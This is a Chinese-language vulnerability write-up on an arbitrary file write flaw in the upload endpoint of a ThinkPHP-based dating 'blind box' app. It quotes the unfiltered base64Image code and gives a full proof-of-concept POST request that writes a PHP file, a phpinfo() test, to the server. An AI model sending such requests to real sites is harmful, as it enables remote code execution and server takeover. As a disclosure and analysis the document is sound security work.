月老情侣交友盲盒4.0.x任意文件写入漏洞

月老情侣交友盲盒系统是一款使用thinkphp开发的盲盒源码，4.0新版本主要是对防封防红做了很大的优化，功能也加了很多。这套源码比以前分享的盲盒源码多了默契匹配、同城匹配、随机匹配、星座匹配模式，源码的UI样式设计的也是非常专业漂亮的，看着还是很不错的!

框架:ThinkPHP V5.1.41 Debug:True

漏洞分析

漏洞位于文件 /app/controller/Upload.php 控制器的upload方法通过input('data/a') 传入Base64编码后的文件，然后经过base64Image方法，代码如下.

public function upload(){ 
  $data = input('data/a');
  $path = [];
  foreach ($data as $v){
    $res = base64Image($v,"uploads/".date("Y-m-d")."/");
    if ($res['code']) {
      $path[] = $res['file'];
    }
  }
  foreach ($path as $index => $item) {
    $path[$index] = substr($item,strpos($item,'attachment'));
  }
  echo json_encode(['code'=>1,'data'=>$path]); 
}

追踪到 /common.php 公共函数文件，该文件为所有控制器都可调用其任意方法，然后通过 file_put_contents 函数将编码后的base64文件直接写入到 /uploads/img/ 文件夹中，且无任何过滤，导致漏洞产生.

function base64Image($image,$filepath='uploads/img/'){
    $imgBase64 = $image;
    if (preg_match('/^(data:\s*image\/(\w+);base64,)/',$imgBase64,$res)) {
        //获取图片类型
        $type = $res[2];
        //图片保存路径
        $new_file = $filepath;
        if (!file_exists($new_file)) {
            mkdir($new_file,0755,true);
        }
        //图片名字
        $new_file = $new_file.time().substr(microtime(),-5).rand(000,999).'.'.$type;
        if (file_put_contents($new_file,base64_decode(str_replace($res[1],'', $imgBase64)))) {
            $msg['code'] = true;
            $msg['file'] = $new_file;
            $msg['msg'] = 'ok';
        } else {
            $msg['code'] = false;
            $msg['msg'] = 'no';
        }
        return $msg;
    }
}

漏洞复现

直接post提交参数data值为base64编码后的内容即可。在线将任意文件转base64内容点这里https://www.shuzixingkong.net/tool/file-to-base64

POST /app/upload/upload HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Cookie: admin_token=6169XyCZ4aFgkoAJYWPrmlH5uKLQOLMi8CwWeC%2FK; PHPSESSID=8d8cmkasea6mfej4t2b1a27blf
Host: 127.0.0.1:81
Origin: http://127.0.0.1:81
Referer: http://127.0.0.1:81/app/upload/upload
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

data=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==